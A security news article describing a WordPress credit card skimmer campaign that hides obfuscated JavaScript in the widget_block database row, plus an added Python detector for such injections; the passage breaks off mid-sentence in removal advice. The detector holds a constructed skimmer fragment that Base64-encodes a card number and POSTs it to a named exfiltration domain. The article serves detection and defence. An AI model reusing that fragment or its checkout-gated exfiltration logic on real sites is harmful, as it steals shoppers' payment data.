Stealthy Credit Card Skimmer Campaign Targets WordPress E-Commerce Sites

2025-01-13

In the ever-evolving landscape of cyber threats, WordPress e-commerce sites have become a prime target for attackers. Recently, Sucuri researchers uncovered a sophisticated credit card skimmer campaign that leverages malicious JavaScript injections into WordPress database tables. This stealthy approach allows attackers to evade detection by traditional security tools, putting countless online businesses and their customers at risk. This article delves into the mechanics of the attack, its implications, and how to safeguard your site against such threats.

of the Campaign

Sucuri researchers have identified a stealthy credit card skimmer campaign targeting WordPress e-commerce sites. The attackers inject malicious JavaScript into the WordPress database, specifically the `wp_options` table, under the `widget_block` row. This obfuscated JavaScript avoids detection by file-scanning tools, enabling it to persist on compromised sites.

The malicious code is injected through the WordPress admin panel (`wp-admin > widgets`) and activates on checkout pages. It dynamically generates a fake payment form mimicking legitimate processors like Stripe or intercepts data entered into real payment forms. The script specifically targets URLs containing “checkout” while excluding “cart,” ensuring it only activates during payment submission.

Stolen data, including credit card numbers, expiration dates, CVV codes, and billing information, is encoded in Base64 and encrypted using AES-CBC. This makes the data appear harmless and complicates analysis. The encrypted data is then transmitted to attacker-controlled servers, such as `valhafather[.]xyz` or `fqbe23[.]xyz`.
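As an added example (not code from Sucuri's report or this article), the following Python check pulls each `content` string out of a PHP-serialized `widget_block` option value and flags inline scripts that carry the traits described above: a "checkout" URL gate, a "cart" exclusion, AES-CBC, Base64 encoding, payment-field access and an outbound host other than the shop's own. The two widget samples, the site host `example-shop.com` and the scoring thresholds are constructed assumptions.

```python
import re

# Traits the report attributes to the injected script, expressed as patterns.
INDICATORS = {
    "checkout_gate": re.compile(r"includes\(\s*['\"]checkout['\"]\s*\)", re.I),
    "cart_exclusion": re.compile(r"!\s*[\w.]+\.includes\(\s*['\"]cart['\"]\s*\)", re.I),
    "aes_cbc": re.compile(r"['\"]AES-CBC['\"]", re.I),
    "base64_encode": re.compile(r"\bbtoa\s*\(", re.I),
    "payment_field": re.compile(r"card_?number|cvv|cvc|expir", re.I),
}
KNOWN_EXFIL_HOSTS = {"valhafather.xyz", "fqbe23.xyz"}  # exfil domains named in the report
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
URL_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)

def widget_contents(blob: bytes):
    """Yield each 'content' string of a PHP-serialized widget_block option.
    PHP string lengths count bytes, so the raw bytes are sliced."""
    for m in re.finditer(rb's:7:"content";s:(\d+):"', blob):
        yield blob[m.end():m.end() + int(m.group(1))].decode("utf-8", "replace")

def analyze_widget_block(blob: bytes, site_host: str) -> list:
    """One finding per inline <script> in any Custom HTML block widget."""
    findings = []
    for content in widget_contents(blob):
        for body in SCRIPT_RE.findall(content):
            hits = [name for name, rx in INDICATORS.items() if rx.search(body)]
            hosts = {h.lower() for h in URL_RE.findall(body)}
            external = sorted(h for h in hosts
                              if h != site_host and not h.endswith("." + site_host))
            if external:
                hits.append("external_host")
            if hosts & KNOWN_EXFIL_HOSTS:
                hits.append("known_exfil_host")
            # Checkout gate plus outbound host is the signature combination; 3+ hits of any kind warrant review.
            suspicious = ("checkout_gate" in hits and bool(external)) or len(hits) >= 3
            findings.append({"hits": hits, "external_hosts": external,
                             "suspicious": suspicious})
    return findings

def serialize_widget_block(contents: list) -> bytes:
    """Build a widget_block-shaped blob (constructed for testing, not a WP export)."""
    items = "".join(f'i:{i + 2};a:1:{{s:7:"content";s:{len(c.encode())}:"{c}";}}'
                    for i, c in enumerate(contents))
    return f'a:{len(contents) + 1}:{{{items}s:12:"_multiwidget";i:1;}}'.encode()

# Constructed sample widgets: a benign first-party loader and a skimmer-like fragment.
BENIGN = '<!-- wp:html --><script src="https://cdn.example-shop.com/a.js"></script><!-- /wp:html -->'
SKIMMER_LIKE = ('<!-- wp:html --><script>if(location.href.includes("checkout")&&'
                '!location.href.includes("cart")){var d=btoa(cardNumber.value);'
                'fetch("https://valhafather.xyz/",{method:"POST",body:d});}</script><!-- /wp:html -->')
```

In practice the blob comes from `SELECT option_value FROM wp_options WHERE option_name = 'widget_block'` (or `wp option get widget_block` via WP-CLI); the check complements, rather than replaces, a manual review of the widgets screen, since the real script is obfuscated and may not match these literal patterns.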

To remove the malware, site administrators should inspect all Custom HTML block widgets in the WordPress admin panel (`wp-admin > Appearance > Widgets`) for suspicious `